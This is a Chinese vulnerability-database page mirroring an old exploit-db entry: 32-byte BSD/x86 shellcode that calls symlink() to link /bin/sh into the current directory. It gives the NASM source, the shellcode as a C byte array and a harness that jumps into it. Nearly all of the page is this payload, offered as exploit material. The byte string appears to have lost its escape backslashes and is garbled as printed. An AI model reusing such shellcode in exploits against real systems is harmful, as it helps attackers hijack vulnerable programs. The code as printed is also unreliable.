BSD/x86 – symlink . /bin/sh Shellcode (32 bytes)

BSD/x86 – symlink . /bin/sh Shellcode (32 bytes)

漏洞ID 1054662 漏洞类型
发布时间 2004-09-26 更新时间 2004-09-26
图片[1]-BSD/x86 – symlink . /bin/sh Shellcode (32 bytes)-安全小百科CVE编号 N/A
图片[2]-BSD/x86 – symlink . /bin/sh Shellcode (32 bytes)-安全小百科CNNVD-ID N/A
漏洞平台 BSD_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13430
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*The shellcode calls the symlink() and makes the 
 link to the /bin/sh in the current dir.
	short version
 size = 32 bytes
 OS   = *BSD
 	written by /rootteam/dev0id (www.sysworld.net)
				[email protected]	
	
BITS 32
jmp short	callme
main:
	pop	esi
	xor	eax,eax
	mov byte [esi+7],al
	lea	ebx,[esi+5]
	push	ebx
	lea	ebx,[esi]
	push	ebx
	mov	al,57
	push	eax
	int	0x80
	
callme:
	call	main
	db	'/bin/sh'
*/

char shellcode[] =
	"xebx12x5ex31xc0x88x46x07x8dx5ex05x53x8dx1ex53"
	"xb0x39x50xcdx80xe8xe9xffxffxffx2fx62x69x6ex2f"
	"x73x68";

int
main (void)
{
	void (*code)(void);
	code=(void(*)())shellcode;
	(void)code();
	return 0;
}

// milw0rm.com [2004-09-26]

相关推荐: Hypermail CGI Mail Open Relay Vulnerability

Hypermail CGI Mail Open Relay Vulnerability 漏洞ID 1100722 漏洞类型 Input Validation Error 发布时间 2003-02-27 更新时间 2003-02-27 CVE编号 N/A CNN…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享